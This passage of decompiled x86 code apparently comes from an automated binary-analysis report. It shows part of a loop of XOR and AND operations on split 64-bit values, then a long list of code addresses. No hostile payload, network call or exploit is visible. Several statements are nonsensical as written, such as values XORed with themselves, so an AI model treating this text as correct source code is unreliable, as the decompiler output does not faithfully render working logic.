                                                                                                                                                                                                                                                                                    					 *(_t2136 + 0x68 + _t1718 * 8) = _v12 ^ _v12;
                                                                                                                                                                                                                                                                                    					 *(_t2136 + 0x6c + _t1718 * 8) = _v8 ^ _v8;
                                                                                                                                                                                                                                                                                    					_v12 = _v28;
                                                                                                                                                                                                                                                                                    					_v8 = _v24;
                                                                                                                                                                                                                                                                                    					_t1719 = _v16;
                                                                                                                                                                                                                                                                                    					_t1911 = _a4;
                                                                                                                                                                                                                                                                                    					_v12 = _v12 ^  *(_t1911 + _t1719 * 8 - 0x258);
                                                                                                                                                                                                                                                                                    					_v8 = _v8 ^  *(_t1911 + _t1719 * 8 - 0x254);
                                                                                                                                                                                                                                                                                    					_t1720 = _v16;
                                                                                                                                                                                                                                                                                    					_t1912 = _a4;
                                                                                                                                                                                                                                                                                    					_v12 = _v12 ^  *(_t1912 + _t1720 * 8 - 0x18);
                                                                                                                                                                                                                                                                                    					_v8 = _v8 ^  *(_t1912 + _t1720 * 8 - 0x14);
                                                                                                                                                                                                                                                                                    					_t1721 = _v16;
                                                                                                                                                                                                                                                                                    					_t1913 = _a4;
                                                                                                                                                                                                                                                                                    					_t1556 = _v16;
                                                                                                                                                                                                                                                                                    					_t2141 = _a4;
                                                                                                                                                                                                                                                                                    					_v12 =  *(_t1913 + _t1721 * 8 - 0x20) &  *(_t2141 + _t1556 * 8 - 0x38) ^ _v12;
                                                                                                                                                                                                                                                                                    					_v8 =  *(_t1913 + _t1721 * 8 - 0x1c) &  *(_t2141 + _t1556 * 8 - 0x34) ^ _v8;
                                                                                                                                                                                                                                                                                    					_t1914 = _v16;
                                                                                                                                                                                                                                                                                    					_t1557 = _a4;
                                                                                                                                                                                                                                                                                    					_t1725 = _v16;
                                                                                                                                                                                                                                                                                    					_t2142 = _a4;
                                                                                                                                                                                                                                                                                    					_v12 =  *(_t1557 + _t1914 * 8 - 0x88) &  *(_t2142 + _t1725 * 8 - 0x1a8) ^ _v12;
                                                                                                                                                                                                                                                                                    					_v8 =  *(_t1557 + _t1914 * 8 - 0x84) &  *(_t2142 + _t1725 * 8 - 0x1a4) ^ _v8;
                                                                                                                                                                                                                                                                                    					L0040EDF8();
                                                                                                                                                                                                                                                                                    					_v12 = _v12 ^ _v12;
                                                                                                                                                                                                                                                                                    					_v8 = _v8 ^ _v8;
                                                                                                                                                                                                                                                                                    					L0040EDFE();
                                                                                                                                                                                                                                                                                    					_t1728 = _v16;
                                                                                                                                                                                                                                                                                    					_t2143 = _a4;
                                                                                                                                                                                                                                                                                    					 *(_t2143 + 0x70 + _t1728 * 8) = _v12 ^ _v12;
                                                                                                                                                                                                                                                                                    					 *(_t2143 + 0x74 + _t1728 * 8) = _v8 ^ _v8;
                                                                                                                                                                                                                                                                                    					_v12 = _v28;
                                                                                                                                                                                                                                                                                    					_v8 = _v24;
                                                                                                                                                                                                                                                                                    					_t1729 = _v16;
                                                                                                                                                                                                                                                                                    					_t1923 = _a4;
                                                                                                                                                                                                                                                                                    					_v12 = _v12 ^  *(_t1923 + _t1729 * 8 - 0x250);
                                                                                                                                                                                                                                                                                    					_v8 = _v8 ^  *(_t1923 + _t1729 * 8 - 0x24c);
                                                                                                                                                                                                                                                                                    					_t1730 = _v16;
                                                                                                                                                                                                                                                                                    					_t1924 = _a4;
                                                                                                                                                                                                                                                                                    					_v12 = _v12 ^  *(_t1924 + _t1730 * 8 - 0x10);
                                                                                                                                                                                                                                                                                    					_v8 = _v8 ^  *(_t1924 + _t1730 * 8 - 0xc);
                                                                                                                                                                                                                                                                                    					_t1731 = _v16;
                                                                                                                                                                                                                                                                                    					_t1925 = _a4;
                                                                                                                                                                                                                                                                                    					_t1567 = _v16;
                                                                                                                                                                                                                                                                                    					_t2148 = _a4;
                                                                                                                                                                                                                                                                                    					_v12 =  *(_t1925 + _t1731 * 8 - 0x18) &  *(_t2148 + _t1567 * 8 - 0x30) ^ _v12;
                                                                                                                                                                                                                                                                                    					_v8 =  *(_t1925 + _t1731 * 8 - 0x14) &  *(_t2148 + _t1567 * 8 - 0x2c) ^ _v8;
                                                                                                                                                                                                                                                                                    					_t1926 = _v16;
                                                                                                                                                                                                                                                                                    					_t1568 = _a4;
                                                                                                                                                                                                                                                                                    					_t1735 = _v16;
                                                                                                                                                                                                                                                                                    					_t2149 = _a4;
                                                                                                                                                                                                                                                                                    					_v12 =  *(_t1568 + _t1926 * 8 - 0x80) &  *(_t2149 + _t1735 * 8 - 0x1a0) ^ _v12;
                                                                                                                                                                                                                                                                                    					_v8 =  *(_t1568 + _t1926 * 8 - 0x7c) &  *(_t2149 + _t1735 * 8 - 0x19c) ^ _v8;
                                                                                                                                                                                                                                                                                    					L0040EDF8();
                                                                                                                                                                                                                                                                                    					_v12 = _v12 ^ _v12;
                                                                                                                                                                                                                                                                                    					_v8 = _v8 ^ _v8;
                                                                                                                                                                                                                                                                                    					L0040EDFE();
                                                                                                                                                                                                                                                                                    					_t1738 = _v16;
                                                                                                                                                                                                                                                                                    					_t2150 = _a4;
                                                                                                                                                                                                                                                                                    					 *(_t2150 + 0x78 + _t1738 * 8) = _v12 ^ _v12;
                                                                                                                                                                                                                                                                                    					 *(_t2150 + 0x7c + _t1738 * 8) = _v8 ^ _v8;
                                                                                                                                                                                                                                                                                    					L0040EDFE();
                                                                                                                                                                                                                                                                                    					L0040EDF8();
                                                                                                                                                                                                                                                                                    					_v28 = _v28 ^ _v28 ^ _v28 &  *0x411128;
                                                                                                                                                                                                                                                                                    					_v24 = _v24 ^ _v24 ^ _v24 &  *0x41112c;
                                                                                                                                                                                                                                                                                    					_v16 = _v16 + 0x10;
                                                                                                                                                                                                                                                                                    					_v32 = _v32 + 0x10;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _t1396;
                                                                                                                                                                                                                                                                                    			}












































































































































































































































                                                                                                                                                                                                                                                                                    0x00406618
                                                                                                                                                                                                                                                                                    0x0040661d
                                                                                                                                                                                                                                                                                    0x00406620
                                                                                                                                                                                                                                                                                    0x00406626
                                                                                                                                                                                                                                                                                    0x00406629
                                                                                                                                                                                                                                                                                    0x00406630
                                                                                                                                                                                                                                                                                    0x00406642
                                                                                                                                                                                                                                                                                    0x00406645
                                                                                                                                                                                                                                                                                    0x0040664b
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00406654
                                                                                                                                                                                                                                                                                    0x0040665a
                                                                                                                                                                                                                                                                                    0x0040665d
                                                                                                                                                                                                                                                                                    0x00406660
                                                                                                                                                                                                                                                                                    0x00406677
                                                                                                                                                                                                                                                                                    0x0040667a
                                                                                                                                                                                                                                                                                    0x0040667d
                                                                                                                                                                                                                                                                                    0x00406680
                                                                                                                                                                                                                                                                                    0x00406697
                                                                                                                                                                                                                                                                                    0x0040669a
                                                                                                                                                                                                                                                                                    0x0040669d
                                                                                                                                                                                                                                                                                    0x004066a0
                                                                                                                                                                                                                                                                                    0x004066a3
                                                                                                                                                                                                                                                                                    0x004066a6
                                                                                                                                                                                                                                                                                    0x004066cb
                                                                                                                                                                                                                                                                                    0x004066ce
                                                                                                                                                                                                                                                                                    0x004066d1
                                                                                                                                                                                                                                                                                    0x004066d4
                                                                                                                                                                                                                                                                                    0x004066d7
                                                                                                                                                                                                                                                                                    0x004066da
                                                                                                                                                                                                                                                                                    0x004066ff
                                                                                                                                                                                                                                                                                    0x00406702
                                                                                                                                                                                                                                                                                    0x0040670d
                                                                                                                                                                                                                                                                                    0x00406718
                                                                                                                                                                                                                                                                                    0x0040671b
                                                                                                                                                                                                                                                                                    0x00406726
                                                                                                                                                                                                                                                                                    0x00406731
                                                                                                                                                                                                                                                                                    0x00406734
                                                                                                                                                                                                                                                                                    0x00406737
                                                                                                                                                                                                                                                                                    0x0040673a
                                                                                                                                                                                                                                                                                    0x00406741
                                                                                                                                                                                                                                                                                    0x00406747
                                                                                                                                                                                                                                                                                    0x0040674a
                                                                                                                                                                                                                                                                                    0x0040674d
                                                                                                                                                                                                                                                                                    0x00406764
                                                                                                                                                                                                                                                                                    0x00406767
                                                                                                                                                                                                                                                                                    0x0040676a
                                                                                                                                                                                                                                                                                    0x0040676d
                                                                                                                                                                                                                                                                                    0x0040677e
                                                                                                                                                                                                                                                                                    0x00406781
                                                                                                                                                                                                                                                                                    0x00406784
                                                                                                                                                                                                                                                                                    0x00406787
                                                                                                                                                                                                                                                                                    0x0040678a
                                                                                                                                                                                                                                                                                    0x0040678d
                                                                                                                                                                                                                                                                                    0x004067b2
                                                                                                                                                                                                                                                                                    0x004067b5
                                                                                                                                                                                                                                                                                    0x004067b8
                                                                                                                                                                                                                                                                                    0x004067bb
                                                                                                                                                                                                                                                                                    0x004067be
                                                                                                                                                                                                                                                                                    0x004067c1
                                                                                                                                                                                                                                                                                    0x004067e6
                                                                                                                                                                                                                                                                                    0x004067e9
                                                                                                                                                                                                                                                                                    0x004067f4
                                                                                                                                                                                                                                                                                    0x004067ff
                                                                                                                                                                                                                                                                                    0x00406802
                                                                                                                                                                                                                                                                                    0x0040680d
                                                                                                                                                                                                                                                                                    0x00406818
                                                                                                                                                                                                                                                                                    0x0040681b
                                                                                                                                                                                                                                                                                    0x0040681e
                                                                                                                                                                                                                                                                                    0x00406822
                                                                                                                                                                                                                                                                                    0x00406829
                                                                                                                                                                                                                                                                                    0x0040682f
                                                                                                                                                                                                                                                                                    0x00406832
                                                                                                                                                                                                                                                                                    0x00406835
                                                                                                                                                                                                                                                                                    0x0040684c
                                                                                                                                                                                                                                                                                    0x0040684f
                                                                                                                                                                                                                                                                                    0x00406852
                                                                                                                                                                                                                                                                                    0x00406855
                                                                                                                                                                                                                                                                                    0x00406866
                                                                                                                                                                                                                                                                                    0x00406869
                                                                                                                                                                                                                                                                                    0x0040686c
                                                                                                                                                                                                                                                                                    0x0040686f
                                                                                                                                                                                                                                                                                    0x00406872
                                                                                                                                                                                                                                                                                    0x00406875
                                                                                                                                                                                                                                                                                    0x00406894
                                                                                                                                                                                                                                                                                    0x00406897
                                                                                                                                                                                                                                                                                    0x0040689a
                                                                                                                                                                                                                                                                                    0x0040689d
                                                                                                                                                                                                                                                                                    0x004068a0
                                                                                                                                                                                                                                                                                    0x004068a3
                                                                                                                                                                                                                                                                                    0x004068c8
                                                                                                                                                                                                                                                                                    0x004068cb
                                                                                                                                                                                                                                                                                    0x004068d6
                                                                                                                                                                                                                                                                                    0x004068e1
                                                                                                                                                                                                                                                                                    0x004068e4
                                                                                                                                                                                                                                                                                    0x004068ef
                                                                                                                                                                                                                                                                                    0x004068fa
                                                                                                                                                                                                                                                                                    0x004068fd
                                                                                                                                                                                                                                                                                    0x00406900
                                                                                                                                                                                                                                                                                    0x00406904
                                                                                                                                                                                                                                                                                    0x0040690b
                                                                                                                                                                                                                                                                                    0x00406911
                                                                                                                                                                                                                                                                                    0x00406914
                                                                                                                                                                                                                                                                                    0x00406917
                                                                                                                                                                                                                                                                                    0x0040692e
                                                                                                                                                                                                                                                                                    0x00406931
                                                                                                                                                                                                                                                                                    0x00406934
                                                                                                                                                                                                                                                                                    0x00406937
                                                                                                                                                                                                                                                                                    0x00406948
                                                                                                                                                                                                                                                                                    0x0040694b
                                                                                                                                                                                                                                                                                    0x0040694e
                                                                                                                                                                                                                                                                                    0x00406951
                                                                                                                                                                                                                                                                                    0x00406954
                                                                                                                                                                                                                                                                                    0x00406957
                                                                                                                                                                                                                                                                                    0x00406976
                                                                                                                                                                                                                                                                                    0x00406979
                                                                                                                                                                                                                                                                                    0x0040697c
                                                                                                                                                                                                                                                                                    0x0040697f
                                                                                                                                                                                                                                                                                    0x00406982
                                                                                                                                                                                                                                                                                    0x00406985
                                                                                                                                                                                                                                                                                    0x004069aa
                                                                                                                                                                                                                                                                                    0x004069ad
                                                                                                                                                                                                                                                                                    0x004069b8
                                                                                                                                                                                                                                                                                    0x004069c3
                                                                                                                                                                                                                                                                                    0x004069c6
                                                                                                                                                                                                                                                                                    0x004069d1
                                                                                                                                                                                                                                                                                    0x004069dc
                                                                                                                                                                                                                                                                                    0x004069df
                                                                                                                                                                                                                                                                                    0x004069e2
                                                                                                                                                                                                                                                                                    0x004069e6
                                                                                                                                                                                                                                                                                    0x004069ed
                                                                                                                                                                                                                                                                                    0x004069f3
                                                                                                                                                                                                                                                                                    0x004069f6
                                                                                                                                                                                                                                                                                    0x004069f9
                                                                                                                                                                                                                                                                                    0x00406a10
                                                                                                                                                                                                                                                                                    0x00406a13
                                                                                                                                                                                                                                                                                    0x00406a16
                                                                                                                                                                                                                                                                                    0x00406a19
                                                                                                                                                                                                                                                                                    0x00406a2a
                                                                                                                                                                                                                                                                                    0x00406a2d
                                                                                                                                                                                                                                                                                    0x00406a30
                                                                                                                                                                                                                                                                                    0x00406a33
                                                                                                                                                                                                                                                                                    0x00406a36
                                                                                                                                                                                                                                                                                    0x00406a39
                                                                                                                                                                                                                                                                                    0x00406a58
                                                                                                                                                                                                                                                                                    0x00406a5b
                                                                                                                                                                                                                                                                                    0x00406a5e
                                                                                                                                                                                                                                                                                    0x00406a61
                                                                                                                                                                                                                                                                                    0x00406a64
                                                                                                                                                                                                                                                                                    0x00406a67
                                                                                                                                                                                                                                                                                    0x00406a8c
                                                                                                                                                                                                                                                                                    0x00406a8f
                                                                                                                                                                                                                                                                                    0x00406a9a
                                                                                                                                                                                                                                                                                    0x00406aa5
                                                                                                                                                                                                                                                                                    0x00406aa8
                                                                                                                                                                                                                                                                                    0x00406ab3
                                                                                                                                                                                                                                                                                    0x00406abe
                                                                                                                                                                                                                                                                                    0x00406ac1
                                                                                                                                                                                                                                                                                    0x00406ac4
                                                                                                                                                                                                                                                                                    0x00406ac8
                                                                                                                                                                                                                                                                                    0x00406acf
                                                                                                                                                                                                                                                                                    0x00406ad5
                                                                                                                                                                                                                                                                                    0x00406ad8
                                                                                                                                                                                                                                                                                    0x00406adb
                                                                                                                                                                                                                                                                                    0x00406af2
                                                                                                                                                                                                                                                                                    0x00406af5
                                                                                                                                                                                                                                                                                    0x00406af8
                                                                                                                                                                                                                                                                                    0x00406afb
                                                                                                                                                                                                                                                                                    0x00406b0c
                                                                                                                                                                                                                                                                                    0x00406b0f
                                                                                                                                                                                                                                                                                    0x00406b12
                                                                                                                                                                                                                                                                                    0x00406b15
                                                                                                                                                                                                                                                                                    0x00406b18
                                                                                                                                                                                                                                                                                    0x00406b1b
                                                                                                                                                                                                                                                                                    0x00406b34
                                                                                                                                                                                                                                                                                    0x00406b37
                                                                                                                                                                                                                                                                                    0x00406b3a
                                                                                                                                                                                                                                                                                    0x00406b3d
                                                                                                                                                                                                                                                                                    0x00406b40
                                                                                                                                                                                                                                                                                    0x00406b43
                                                                                                                                                                                                                                                                                    0x00406b68
                                                                                                                                                                                                                                                                                    0x00406b6b
                                                                                                                                                                                                                                                                                    0x00406b76
                                                                                                                                                                                                                                                                                    0x00406b81
                                                                                                                                                                                                                                                                                    0x00406b84
                                                                                                                                                                                                                                                                                    0x00406b8f
                                                                                                                                                                                                                                                                                    0x00406b9a
                                                                                                                                                                                                                                                                                    0x00406b9d
                                                                                                                                                                                                                                                                                    0x00406ba0
                                                                                                                                                                                                                                                                                    0x00406ba4
                                                                                                                                                                                                                                                                                    0x00406bab
                                                                                                                                                                                                                                                                                    0x00406bb1
                                                                                                                                                                                                                                                                                    0x00406bb4
                                                                                                                                                                                                                                                                                    0x00406bb7
                                                                                                                                                                                                                                                                                    0x00406bce
                                                                                                                                                                                                                                                                                    0x00406bd1
                                                                                                                                                                                                                                                                                    0x00406bd4
                                                                                                                                                                                                                                                                                    0x00406bd7
                                                                                                                                                                                                                                                                                    0x00406be8
                                                                                                                                                                                                                                                                                    0x00406beb
                                                                                                                                                                                                                                                                                    0x00406bee
                                                                                                                                                                                                                                                                                    0x00406bf1
                                                                                                                                                                                                                                                                                    0x00406bf4
                                                                                                                                                                                                                                                                                    0x00406bf7
                                                                                                                                                                                                                                                                                    0x00406c10
                                                                                                                                                                                                                                                                                    0x00406c13
                                                                                                                                                                                                                                                                                    0x00406c16
                                                                                                                                                                                                                                                                                    0x00406c19
                                                                                                                                                                                                                                                                                    0x00406c1c
                                                                                                                                                                                                                                                                                    0x00406c1f
                                                                                                                                                                                                                                                                                    0x00406c44
                                                                                                                                                                                                                                                                                    0x00406c47
                                                                                                                                                                                                                                                                                    0x00406c52
                                                                                                                                                                                                                                                                                    0x00406c5d
                                                                                                                                                                                                                                                                                    0x00406c60
                                                                                                                                                                                                                                                                                    0x00406c6b
                                                                                                                                                                                                                                                                                    0x00406c76
                                                                                                                                                                                                                                                                                    0x00406c79
                                                                                                                                                                                                                                                                                    0x00406c7c
                                                                                                                                                                                                                                                                                    0x00406c80
                                                                                                                                                                                                                                                                                    0x00406c87
                                                                                                                                                                                                                                                                                    0x00406c8d
                                                                                                                                                                                                                                                                                    0x00406c90
                                                                                                                                                                                                                                                                                    0x00406c93
                                                                                                                                                                                                                                                                                    0x00406caa
                                                                                                                                                                                                                                                                                    0x00406cad
                                                                                                                                                                                                                                                                                    0x00406cb0
                                                                                                                                                                                                                                                                                    0x00406cb3
                                                                                                                                                                                                                                                                                    0x00406cc4
                                                                                                                                                                                                                                                                                    0x00406cc7
                                                                                                                                                                                                                                                                                    0x00406cca
                                                                                                                                                                                                                                                                                    0x00406ccd
                                                                                                                                                                                                                                                                                    0x00406cd0
                                                                                                                                                                                                                                                                                    0x00406cd3
                                                                                                                                                                                                                                                                                    0x00406cec
                                                                                                                                                                                                                                                                                    0x00406cef
                                                                                                                                                                                                                                                                                    0x00406cf2
                                                                                                                                                                                                                                                                                    0x00406cf5
                                                                                                                                                                                                                                                                                    0x00406cf8
                                                                                                                                                                                                                                                                                    0x00406cfb
                                                                                                                                                                                                                                                                                    0x00406d20
                                                                                                                                                                                                                                                                                    0x00406d23
                                                                                                                                                                                                                                                                                    0x00406d2e
                                                                                                                                                                                                                                                                                    0x00406d39
                                                                                                                                                                                                                                                                                    0x00406d3c
                                                                                                                                                                                                                                                                                    0x00406d47
                                                                                                                                                                                                                                                                                    0x00406d52
                                                                                                                                                                                                                                                                                    0x00406d55
                                                                                                                                                                                                                                                                                    0x00406d58
                                                                                                                                                                                                                                                                                    0x00406d5c
                                                                                                                                                                                                                                                                                    0x00406d63
                                                                                                                                                                                                                                                                                    0x00406d69
                                                                                                                                                                                                                                                                                    0x00406d6c
                                                                                                                                                                                                                                                                                    0x00406d6f
                                                                                                                                                                                                                                                                                    0x00406d86
                                                                                                                                                                                                                                                                                    0x00406d89
                                                                                                                                                                                                                                                                                    0x00406d8c
                                                                                                                                                                                                                                                                                    0x00406d8f
                                                                                                                                                                                                                                                                                    0x00406da0
                                                                                                                                                                                                                                                                                    0x00406da3
                                                                                                                                                                                                                                                                                    0x00406da6
                                                                                                                                                                                                                                                                                    0x00406da9
                                                                                                                                                                                                                                                                                    0x00406dac
                                                                                                                                                                                                                                                                                    0x00406daf
                                                                                                                                                                                                                                                                                    0x00406dc8
                                                                                                                                                                                                                                                                                    0x00406dcb
                                                                                                                                                                                                                                                                                    0x00406dce
                                                                                                                                                                                                                                                                                    0x00406dd1
                                                                                                                                                                                                                                                                                    0x00406dd4
                                                                                                                                                                                                                                                                                    0x00406dd7
                                                                                                                                                                                                                                                                                    0x00406dfc
                                                                                                                                                                                                                                                                                    0x00406dff
                                                                                                                                                                                                                                                                                    0x00406e0a
                                                                                                                                                                                                                                                                                    0x00406e15
                                                                                                                                                                                                                                                                                    0x00406e18
                                                                                                                                                                                                                                                                                    0x00406e23
                                                                                                                                                                                                                                                                                    0x00406e2e
                                                                                                                                                                                                                                                                                    0x00406e31
                                                                                                                                                                                                                                                                                    0x00406e34
                                                                                                                                                                                                                                                                                    0x00406e38
                                                                                                                                                                                                                                                                                    0x00406e3f
                                                                                                                                                                                                                                                                                    0x00406e45
                                                                                                                                                                                                                                                                                    0x00406e48
                                                                                                                                                                                                                                                                                    0x00406e4b
                                                                                                                                                                                                                                                                                    0x00406e62
                                                                                                                                                                                                                                                                                    0x00406e65
                                                                                                                                                                                                                                                                                    0x00406e68
                                                                                                                                                                                                                                                                                    0x00406e6b
                                                                                                                                                                                                                                                                                    0x00406e7c
                                                                                                                                                                                                                                                                                    0x00406e7f
                                                                                                                                                                                                                                                                                    0x00406e82
                                                                                                                                                                                                                                                                                    0x00406e85
                                                                                                                                                                                                                                                                                    0x00406e88
                                                                                                                                                                                                                                                                                    0x00406e8b
                                                                                                                                                                                                                                                                                    0x00406ea4
                                                                                                                                                                                                                                                                                    0x00406ea7
                                                                                                                                                                                                                                                                                    0x00406eaa
                                                                                                                                                                                                                                                                                    0x00406ead
                                                                                                                                                                                                                                                                                    0x00406eb0
                                                                                                                                                                                                                                                                                    0x00406eb3
                                                                                                                                                                                                                                                                                    0x00406ed8
                                                                                                                                                                                                                                                                                    0x00406edb
                                                                                                                                                                                                                                                                                    0x00406ee6
                                                                                                                                                                                                                                                                                    0x00406ef1
                                                                                                                                                                                                                                                                                    0x00406ef4
                                                                                                                                                                                                                                                                                    0x00406eff
                                                                                                                                                                                                                                                                                    0x00406f0a
                                                                                                                                                                                                                                                                                    0x00406f0d
                                                                                                                                                                                                                                                                                    0x00406f10
                                                                                                                                                                                                                                                                                    0x00406f14
                                                                                                                                                                                                                                                                                    0x00406f1b
                                                                                                                                                                                                                                                                                    0x00406f21
                                                                                                                                                                                                                                                                                    0x00406f24
                                                                                                                                                                                                                                                                                    0x00406f27
                                                                                                                                                                                                                                                                                    0x00406f3e
                                                                                                                                                                                                                                                                                    0x00406f41
                                                                                                                                                                                                                                                                                    0x00406f44
                                                                                                                                                                                                                                                                                    0x00406f47
                                                                                                                                                                                                                                                                                    0x00406f58
                                                                                                                                                                                                                                                                                    0x00406f5b
                                                                                                                                                                                                                                                                                    0x00406f5e
                                                                                                                                                                                                                                                                                    0x00406f61
                                                                                                                                                                                                                                                                                    0x00406f64
                                                                                                                                                                                                                                                                                    0x00406f67
                                                                                                                                                                                                                                                                                    0x00406f80
                                                                                                                                                                                                                                                                                    0x00406f83
                                                                                                                                                                                                                                                                                    0x00406f86
                                                                                                                                                                                                                                                                                    0x00406f89
                                                                                                                                                                                                                                                                                    0x00406f8c
                                                                                                                                                                                                                                                                                    0x00406f8f
                                                                                                                                                                                                                                                                                    0x00406fb4
                                                                                                                                                                                                                                                                                    0x00406fb7
                                                                                                                                                                                                                                                                                    0x00406fc2
                                                                                                                                                                                                                                                                                    0x00406fcd
                                                                                                                                                                                                                                                                                    0x00406fd0
                                                                                                                                                                                                                                                                                    0x00406fdb
                                                                                                                                                                                                                                                                                    0x00406fe6
                                                                                                                                                                                                                                                                                    0x00406fe9
                                                                                                                                                                                                                                                                                    0x00406fec
                                                                                                                                                                                                                                                                                    0x00406ff0
                                                                                                                                                                                                                                                                                    0x00406ff7
                                                                                                                                                                                                                                                                                    0x00406ffd
                                                                                                                                                                                                                                                                                    0x00407000
                                                                                                                                                                                                                                                                                    0x00407003
                                                                                                                                                                                                                                                                                    0x0040701a
                                                                                                                                                                                                                                                                                    0x0040701d
                                                                                                                                                                                                                                                                                    0x00407020
                                                                                                                                                                                                                                                                                    0x00407023
                                                                                                                                                                                                                                                                                    0x00407034
                                                                                                                                                                                                                                                                                    0x00407037
                                                                                                                                                                                                                                                                                    0x0040703a
                                                                                                                                                                                                                                                                                    0x0040703d
                                                                                                                                                                                                                                                                                    0x00407040
                                                                                                                                                                                                                                                                                    0x00407043
                                                                                                                                                                                                                                                                                    0x0040705c
                                                                                                                                                                                                                                                                                    0x0040705f
                                                                                                                                                                                                                                                                                    0x00407062
                                                                                                                                                                                                                                                                                    0x00407065
                                                                                                                                                                                                                                                                                    0x00407068
                                                                                                                                                                                                                                                                                    0x0040706b
                                                                                                                                                                                                                                                                                    0x00407090
                                                                                                                                                                                                                                                                                    0x00407093
                                                                                                                                                                                                                                                                                    0x0040709e
                                                                                                                                                                                                                                                                                    0x004070a9
                                                                                                                                                                                                                                                                                    0x004070ac
                                                                                                                                                                                                                                                                                    0x004070b7
                                                                                                                                                                                                                                                                                    0x004070c2
                                                                                                                                                                                                                                                                                    0x004070c5
                                                                                                                                                                                                                                                                                    0x004070c8
                                                                                                                                                                                                                                                                                    0x004070cc
                                                                                                                                                                                                                                                                                    0x004070d3
                                                                                                                                                                                                                                                                                    0x004070d9
                                                                                                                                                                                                                                                                                    0x004070dc
                                                                                                                                                                                                                                                                                    0x004070df
                                                                                                                                                                                                                                                                                    0x004070f6
                                                                                                                                                                                                                                                                                    0x004070f9
                                                                                                                                                                                                                                                                                    0x004070fc
                                                                                                                                                                                                                                                                                    0x004070ff
                                                                                                                                                                                                                                                                                    0x00407110
                                                                                                                                                                                                                                                                                    0x00407113
                                                                                                                                                                                                                                                                                    0x00407116
                                                                                                                                                                                                                                                                                    0x00407119
                                                                                                                                                                                                                                                                                    0x0040711c
                                                                                                                                                                                                                                                                                    0x0040711f
                                                                                                                                                                                                                                                                                    0x00407138
                                                                                                                                                                                                                                                                                    0x0040713b
                                                                                                                                                                                                                                                                                    0x0040713e
                                                                                                                                                                                                                                                                                    0x00407141
                                                                                                                                                                                                                                                                                    0x00407144
                                                                                                                                                                                                                                                                                    0x00407147
                                                                                                                                                                                                                                                                                    0x0040716c
                                                                                                                                                                                                                                                                                    0x0040716f
                                                                                                                                                                                                                                                                                    0x0040717a
                                                                                                                                                                                                                                                                                    0x00407185
                                                                                                                                                                                                                                                                                    0x00407188
                                                                                                                                                                                                                                                                                    0x00407193
                                                                                                                                                                                                                                                                                    0x0040719e
                                                                                                                                                                                                                                                                                    0x004071a1
                                                                                                                                                                                                                                                                                    0x004071a4
                                                                                                                                                                                                                                                                                    0x004071a8
                                                                                                                                                                                                                                                                                    0x004071af
                                                                                                                                                                                                                                                                                    0x004071b5
                                                                                                                                                                                                                                                                                    0x004071b8
                                                                                                                                                                                                                                                                                    0x004071bb
                                                                                                                                                                                                                                                                                    0x004071d2
                                                                                                                                                                                                                                                                                    0x004071d5
                                                                                                                                                                                                                                                                                    0x004071d8
                                                                                                                                                                                                                                                                                    0x004071db
                                                                                                                                                                                                                                                                                    0x004071ec
                                                                                                                                                                                                                                                                                    0x004071ef
                                                                                                                                                                                                                                                                                    0x004071f2
                                                                                                                                                                                                                                                                                    0x004071f5
                                                                                                                                                                                                                                                                                    0x004071f8
                                                                                                                                                                                                                                                                                    0x004071fb
                                                                                                                                                                                                                                                                                    0x00407214
                                                                                                                                                                                                                                                                                    0x00407217
                                                                                                                                                                                                                                                                                    0x0040721a
                                                                                                                                                                                                                                                                                    0x0040721d
                                                                                                                                                                                                                                                                                    0x00407220
                                                                                                                                                                                                                                                                                    0x00407223
                                                                                                                                                                                                                                                                                    0x00407248
                                                                                                                                                                                                                                                                                    0x0040724b
                                                                                                                                                                                                                                                                                    0x00407256
                                                                                                                                                                                                                                                                                    0x00407261
                                                                                                                                                                                                                                                                                    0x00407264
                                                                                                                                                                                                                                                                                    0x0040726f
                                                                                                                                                                                                                                                                                    0x0040727a
                                                                                                                                                                                                                                                                                    0x0040727d
                                                                                                                                                                                                                                                                                    0x00407280
                                                                                                                                                                                                                                                                                    0x00407284
                                                                                                                                                                                                                                                                                    0x0040728b
                                                                                                                                                                                                                                                                                    0x00407291
                                                                                                                                                                                                                                                                                    0x00407294
                                                                                                                                                                                                                                                                                    0x00407297
                                                                                                                                                                                                                                                                                    0x004072ae
                                                                                                                                                                                                                                                                                    0x004072b1
                                                                                                                                                                                                                                                                                    0x004072b4
                                                                                                                                                                                                                                                                                    0x004072b7
                                                                                                                                                                                                                                                                                    0x004072c8
                                                                                                                                                                                                                                                                                    0x004072cb
                                                                                                                                                                                                                                                                                    0x004072ce
                                                                                                                                                                                                                                                                                    0x004072d1
                                                                                                                                                                                                                                                                                    0x004072d4
                                                                                                                                                                                                                                                                                    0x004072d7
                                                                                                                                                                                                                                                                                    0x004072f0
                                                                                                                                                                                                                                                                                    0x004072f3
                                                                                                                                                                                                                                                                                    0x004072f6
                                                                                                                                                                                                                                                                                    0x004072f9
                                                                                                                                                                                                                                                                                    0x004072fc
                                                                                                                                                                                                                                                                                    0x004072ff
                                                                                                                                                                                                                                                                                    0x00407324
                                                                                                                                                                                                                                                                                    0x00407327
                                                                                                                                                                                                                                                                                    0x00407332
                                                                                                                                                                                                                                                                                    0x0040733d
                                                                                                                                                                                                                                                                                    0x00407340
                                                                                                                                                                                                                                                                                    0x0040734b
                                                                                                                                                                                                                                                                                    0x00407356
                                                                                                                                                                                                                                                                                    0x00407359
                                                                                                                                                                                                                                                                                    0x0040735c
                                                                                                                                                                                                                                                                                    0x00407360
                                                                                                                                                                                                                                                                                    0x00407367
                                                                                                                                                                                                                                                                                    0x0040736d
                                                                                                                                                                                                                                                                                    0x00407370
                                                                                                                                                                                                                                                                                    0x00407373
                                                                                                                                                                                                                                                                                    0x0040738a
                                                                                                                                                                                                                                                                                    0x0040738d
                                                                                                                                                                                                                                                                                    0x00407390
                                                                                                                                                                                                                                                                                    0x00407393
                                                                                                                                                                                                                                                                                    0x004073a4
                                                                                                                                                                                                                                                                                    0x004073a7
                                                                                                                                                                                                                                                                                    0x004073aa
                                                                                                                                                                                                                                                                                    0x004073ad
                                                                                                                                                                                                                                                                                    0x004073b0
                                                                                                                                                                                                                                                                                    0x004073b3
                                                                                                                                                                                                                                                                                    0x004073cc
                                                                                                                                                                                                                                                                                    0x004073cf
                                                                                                                                                                                                                                                                                    0x004073d2
                                                                                                                                                                                                                                                                                    0x004073d5
                                                                                                                                                                                                                                                                                    0x004073d8
                                                                                                                                                                                                                                                                                    0x004073db
                                                                                                                                                                                                                                                                                    0x004073fa
